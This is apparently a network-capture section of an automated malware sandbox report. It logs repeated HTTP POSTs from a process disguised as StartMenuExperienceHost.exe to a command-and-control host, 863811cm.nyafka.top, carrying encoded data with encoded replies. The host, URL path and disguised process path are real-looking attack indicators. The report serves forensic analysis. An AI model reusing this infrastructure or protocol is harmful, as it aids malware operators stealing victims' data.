                                                                Data Ascii: 98'**&U /Y,$Z)[&(W4&?_:)5],(?)$3Y+!*Q:+30<!9Z?1^$0=>->0."51/>Z'T,+@=+=#+*_:(8P"Q%!-?S5)R*933/1 4?P"Z6V43%8"_")Q?TR0
                                                                Oct 11, 2024 01:37:06.983975887 CEST746INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:06 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OrkWobDyb9vh3cy%2FE4%2FkuKNqTaznrs1xkqln0I5HN6stWuLnxzkqJbs2yf%2F2U22c5AvhExQoDJ2QS8wQgYvPuXpiKhhCdTe0hGm%2FhMCXzyHicBbysdL9SqGV5cvNUK8UmAoXjuK6"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6fb739654252-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 15 2a 2a 26 55 20 07 2f 59 2c 08 24 5a 29 5b 26 16 28 57 34 06 26 0a 3f 5f 3a 05 29 1e 35 5d 2c 17 28 3f 29 03 24 02 33 59 2b 21 2a 51 03 1b 3a 01 2b 33 30 09 3c 21 39 5a 3f 1c 31 5e 24 30 3d 0b 3e 2d 3e 0f 30 2e 22 15 35 31 2f 0f 3e 5a 27 54 2c 15 2b 40 3d 2b 3d 02 23 2b 2a 5f 08 13 3a 0e 28 38 0e 50 22 51 25 15 21 2d 3f 53 35 29 04 52 2a 00 39 0e 33 33 05 05 2f 31 20 10 34 01 3f 50 22 5a 36 56 34 04 33 00 25 38 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'**&U /Y,$Z)[&(W4&?_:)5],(?)$3Y+!*Q:+30<!9Z?1^$0=>->0."51/>Z'T,+@=+=#+*_:(8P"Q%!-?S5)R*933/1 4?P"Z6V43%8"_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                60192.168.2.550041188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:07.103682041 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1984
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:07.483670950 CEST1984OUTData Raw: 50 5c 5d 5c 54 5d 58 56 5e 5a 55 58 51 50 5a 5d 57 5f 58 59 55 52 51 5c 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P\]\T]XV^ZUXQPZ]W_XYURQ\XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9?/((%=3(_6;,<V7''Q'-%V=8+ 1(^*#Y$/\*5
                                                                Oct 11, 2024 01:37:07.557112932 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:07.782233953 CEST758INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:07 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D3D%2FnpZV9qDd%2FXZn%2BJtP%2Byq9r%2Bfy3nSGtBFvl2SqbSb3KnG2GjvM2XA%2Fn1e6D8iBOf0ZnadkuRm7plxRJMoY%2FljHbQ9d4YYvY6wfncA2p1sBRVx3eQG3ai%2B9IGjSDj%2FEi3ST0Xp%2F"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6fbdef084240-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 05 3d 2a 22 1f 37 3e 2c 05 2c 21 28 10 2a 2d 21 01 3c 0f 37 5a 25 27 3f 58 3a 05 3d 1e 35 05 2f 00 3e 02 2e 5b 27 12 23 5b 3f 0b 2a 51 03 1b 39 5a 3f 20 27 13 2b 0c 35 19 3c 0c 00 07 27 33 13 44 3d 5b 3d 54 30 3d 3a 5e 36 21 20 56 2a 02 33 53 38 28 37 44 2a 16 0f 01 37 01 2a 5f 08 13 3a 09 3d 28 3c 55 21 09 07 5c 22 13 34 0c 22 39 2d 0a 2a 2a 39 0d 24 23 3c 15 2f 32 37 00 37 01 0a 0c 21 02 36 1d 20 3e 23 00 31 12 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98$=*"7>,,!(*-!<7Z%'?X:=5/>.['#[?*Q9Z? '+5<'3D=[=T0=:^6! V*3S8(7D*7*_:=(<U!\"4"9-**9$#</277!6 >#1"_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                61192.168.2.550042188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:07.901335955 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1972
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:08.253825903 CEST1972OUTData Raw: 55 5d 5d 5d 51 5b 58 57 5e 5a 55 58 51 55 5a 5f 57 5c 58 5e 55 5d 51 52 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U]]]Q[XW^ZUXQUZ_W\X^U]QRXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9Y+. Z? '> A+%4",?"7$;39*("2,Z>#Y$/\*5
                                                                Oct 11, 2024 01:37:08.347424030 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:08.593625069 CEST760INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:08 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wi%2F0yQz1WmTjSSzJjx1zOhpI%2F3sxhaJeGVDpl22PXf%2B6LYRcc9JuPag%2BRml2aEP%2B6Ia8dU5Us%2F%2FWrnsk%2Bx%2FYYUzp%2FJxyjWXW4M%2FvwgESLScX4OZP9d9vUcBWNYOeFKgxzwPoiLW5"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6fc2dc2017f9-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 5f 3e 3a 32 1e 20 2e 02 02 3b 0f 0e 1d 2a 3e 32 1b 29 31 3b 5e 32 0a 19 1a 2c 2c 0f 54 22 15 34 5c 29 3f 36 5a 26 2c 24 05 3f 31 2a 51 03 1b 39 5a 2b 20 33 51 29 31 35 16 3c 22 29 15 26 20 3d 44 2a 2e 22 0e 27 3d 26 16 35 32 3c 55 3e 3c 33 52 2d 38 2b 44 3e 06 03 03 21 3b 2a 5f 08 13 39 56 3e 16 20 50 22 24 21 17 21 2e 27 52 21 3a 2e 52 3d 39 2a 1e 25 20 38 15 38 22 28 1d 21 2c 2b 1c 36 2f 3d 0d 23 2d 3f 00 27 28 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'_>:2 .;*>2)1;^2,,T"4\)?6Z&,$?1*Q9Z+ 3Q)15<")& =D*."'=&52<U><3R-8+D>!;*_9V> P"$!!.'R!:.R=9*% 88"(!,+6/=#-?'("_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                62192.168.2.550043188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:07.909451962 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:08.253843069 CEST2584OUTData Raw: 50 5b 5d 59 51 5b 58 5f 5e 5a 55 58 51 51 5a 5b 57 59 58 5c 55 52 51 5c 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P[]YQ[X_^ZUXQQZ[WYX\URQ\XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9<+<)<'.(&0_!;X+3"7<3=-T>;$B!=;#Y$/\*1
                                                                Oct 11, 2024 01:37:08.356837034 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:08.552535057 CEST591INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:08 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UmImgnHpyb43JAPKhQpLlvDTZEJbecHK3V5fqdbWNyrrQKB6J71hzIku1c334lWxTDDehvfD%2FVQ6R9g2RMoWzKRHWQ1STCY9q1c13oS0eWWbOsi2P6yN4rQl7yh7o3D2C7Ui3f0A"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6fc2ecc17ce8-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                63192.168.2.550044188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:08.681037903 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:09.034933090 CEST2584OUTData Raw: 50 5f 5d 5d 54 5e 5d 52 5e 5a 55 58 51 53 5a 5c 57 51 58 58 55 52 51 58 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P_]]T^]R^ZUXQSZ\WQXXURQXXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9X)-,Y(/&>(+\5,+= $>"2 )#Y$/\*9
                                                                Oct 11, 2024 01:37:09.148144960 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:09.391491890 CEST599INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:09 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Y3pNXkRowRO7DzHQ3HYJ6L5M1vHqqiTuwOGzacIhPhDypE%2B6%2BppkVMkzGshM2ot03BtvycXPRGV%2FRWUn0YHe%2Bry5IemoATWdD60Ix3sbM9xX3I5RwMS%2Bv8Cv4SVi9sQkfKJrhpT"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6fc7ddbfde9a-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0
                                                                Oct 11, 2024 01:37:09.472780943 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1984
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:09.572318077 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:09.572571039 CEST1984OUTData Raw: 50 5c 5d 5e 51 58 5d 55 5e 5a 55 58 51 56 5a 5a 57 5b 58 5f 55 55 51 5d 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P\]^QX]U^ZUXQVZZW[X_UUQ]XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9^+ <982-?<&4#;+Z+37'+S'-)("1*#Y$/\*-
                                                                Oct 11, 2024 01:37:09.823486090 CEST739INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:09 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AcwDCI50FnIzpYJMRwyHZ3JFGTiRLbIvPOWdIiwbDktB51QC6BFhm%2F%2FSpli8HjFtDu8TP87h3pK04Nqte1hAtrw3%2BsEiKXBPzYgeOtFrziPUBoDF8tCQcvb5sfQyzsjjFru1TU73"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6fca7cd5de9a-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 05 2a 00 39 0b 23 07 23 11 2c 32 30 12 2a 03 2a 1b 2b 0f 28 03 25 0a 23 5d 39 3f 26 0c 23 3b 34 5e 2a 12 2a 59 33 2f 33 10 29 21 2a 51 03 1b 3a 01 3c 20 2b 1d 3f 54 2d 5c 28 0b 2d 5f 26 23 13 08 29 5b 36 0f 33 00 2d 07 36 21 0e 1e 3d 2c 33 1d 2c 28 20 18 3e 01 3e 5c 20 01 2a 5f 08 13 3a 08 29 16 24 54 22 09 25 5d 22 03 20 0f 22 29 32 19 3e 07 08 57 30 20 38 1a 38 0c 0a 5e 37 01 24 0f 36 3f 31 0d 20 13 2c 13 25 02 22 5f 22 00 29 51 00 3f 54 52 0d 0a
                                                                Data Ascii: 98$*9##,20**+(%#]9?&#;4^**Y3/3)!*Q:< +?T-\(-_&#)[63-6!=,3,( >>\ *_:)$T"%]" ")2>W0 88^7$6?1 ,%"_")Q?TR
                                                                Oct 11, 2024 01:37:09.958599091 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Oct 11, 2024 01:37:10.091428995 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:10.191956043 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:10.194210052 CEST2004OUTData Raw: 50 5b 5d 59 51 5b 5d 56 5e 5a 55 58 51 54 5a 5c 57 50 58 5c 55 50 51 52 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P[]YQ[]V^ZUXQTZ\WPX\UPQRXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9Y?[0\+$%(D+0^#('Z(3&4$Q0=:>;#"1#=;#Y$/\*%
                                                                Oct 11, 2024 01:37:10.491556883 CEST744INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:10 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cxvPwQW0zj5Q11S8wuyeHrG08Yz1fuKCErVvignOQovdRgfqT1%2FESlWI3swaOS%2F9V6ZgJeJAdGW0xXP74qAzibTBoVhTBmHBsHc2uiuk%2FsWuAG8RY3peOCsrx4BXWs3UR7QooXZm"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6fce5f69de9a-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 14 3e 17 3e 54 20 10 2f 59 3b 32 24 5f 2b 3e 32 16 3c 31 3b 5f 24 34 16 01 2e 02 08 0a 36 2b 3c 15 2a 05 2d 06 27 2c 37 5b 29 31 2a 51 03 1b 39 13 2b 0d 2b 56 3f 0c 08 05 28 0c 2e 06 30 0a 22 19 2a 2d 0f 56 27 58 31 00 35 1f 2b 0a 3d 02 2b 1e 38 28 20 1d 29 3b 31 04 23 3b 2a 5f 08 13 39 56 2a 28 2f 08 35 27 21 5d 35 03 3f 56 20 2a 3a 53 2a 3a 2d 0d 33 33 24 58 2c 31 28 5a 34 2c 33 55 23 2f 36 53 37 3d 3c 13 32 28 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'>>T /Y;2$_+>2<1;_$4.6+<*-',7[)1*Q9++V?(.0"*-V'X15+=+8( );1#;*_9V*(/5'!]5?V *:S*:-33$X,1(Z4,3U#/6S7=<2("_")Q?TR0
                                                                Oct 11, 2024 01:37:10.597743988 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1992
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:10.697616100 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:10.697801113 CEST1992OUTData Raw: 50 5b 5d 5c 54 5e 58 5e 5e 5a 55 58 51 55 5a 5e 57 5e 58 5e 55 55 51 52 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P[]\T^X^^ZUXQUZ^W^X^UUQRXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:?=#+:&-$E<_!<)3 4?$-"*8862;*+#Y$/\*1
                                                                Oct 11, 2024 01:37:10.998975039 CEST744INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:10 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x1%2BoJgd9LgEmTJ51XC6WJdDKyjJTcahzyV4ig0tkE1WXhyECcx9MMMeELVP7I5yhADFvifTltwafdF%2FfXExBKmfFfZOdhCSKMXuB5D%2FqKzorJdpEO38kdH77l84QbTgthpXyjLDk"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6fd18965de9a-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 5c 29 00 32 55 22 2d 3c 01 2c 08 24 5a 2a 3d 32 5e 29 31 27 58 31 1d 20 00 39 3c 0f 57 22 28 28 59 3d 2f 3e 5b 33 02 37 5d 29 21 2a 51 03 1b 39 11 3f 20 2b 55 29 22 2d 17 3f 1c 3d 5e 27 0d 25 08 29 04 2d 1f 30 2e 21 06 21 1f 3f 0c 29 02 23 52 2c 28 30 1c 3d 06 3e 5c 37 01 2a 5f 08 13 39 56 3d 06 28 1c 35 27 3a 04 23 2e 34 0e 22 07 07 0e 3d 29 00 55 27 33 3c 14 2c 22 20 10 34 3f 28 09 22 02 22 57 20 03 3c 5a 25 12 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'\)2U"-<,$Z*=2^)1'X1 9<W"((Y=/>[37])!*Q9? +U)"-?=^'%)-0.!!?)#R,(0=>\7*_9V=(5':#.4"=)U'3<," 4?(""W <Z%"_")Q?TR0
                                                                Oct 11, 2024 01:37:11.113461018 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:11.213565111 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:11.213776112 CEST2004OUTData Raw: 50 59 5d 5d 51 5e 58 51 5e 5a 55 58 51 5d 5a 5a 57 5a 58 55 55 51 51 5e 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PY]]Q^XQ^ZUXQ]ZZWZXUUQQ^XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9^(=Y<*%.;(06+/])39T ?0=U)(51+=;#Y$/\*
                                                                Oct 11, 2024 01:37:11.514797926 CEST742INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:11 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9QzwsN6PNXjNhbbyhWcLIiIaqcTBPNpbk2wuQT83c0JULqfs86KnQBlCvCuO24Kxx%2B7cGJCRUAb1R479CKRldCO4fnMLfSQXtmagpUilERwTNQgqOFuTMoLs4jnZp4n%2FSJAYdt9P"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6fd4cb04de9a-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 5d 29 5f 22 52 22 3e 3f 58 2c 0f 33 07 29 2e 22 1b 2b 57 37 13 26 24 3f 5d 3a 02 0b 54 22 2b 30 5e 2a 02 2a 5e 27 2c 05 58 29 21 2a 51 03 1b 39 11 3e 30 3b 54 3c 32 21 5c 3c 31 22 05 24 1d 3e 1c 2a 3d 35 51 30 00 07 07 36 21 34 56 3e 3c 3c 0e 38 28 3c 18 3e 01 3d 02 34 01 2a 5f 08 13 39 57 2a 5e 24 13 35 37 29 15 35 3e 24 0f 22 29 0b 0a 3d 07 26 1d 30 0d 38 59 2d 31 27 02 23 06 2b 56 21 5a 2a 10 23 2d 06 58 26 02 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'])_"R">?X,3)."+W7&$?]:T"+0^**^',X)!*Q9>0;T<2!\<1"$>*=5Q06!4V><<8(<>=4*_9W*^$57)5>$")=&08Y-1'#+V!Z*#-X&"_")Q?TR0
                                                                Oct 11, 2024 01:37:11.629210949 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:11.728913069 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:11.729396105 CEST2004OUTData Raw: 50 58 58 58 54 5c 58 57 5e 5a 55 58 51 50 5a 58 57 58 58 5f 55 50 51 52 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
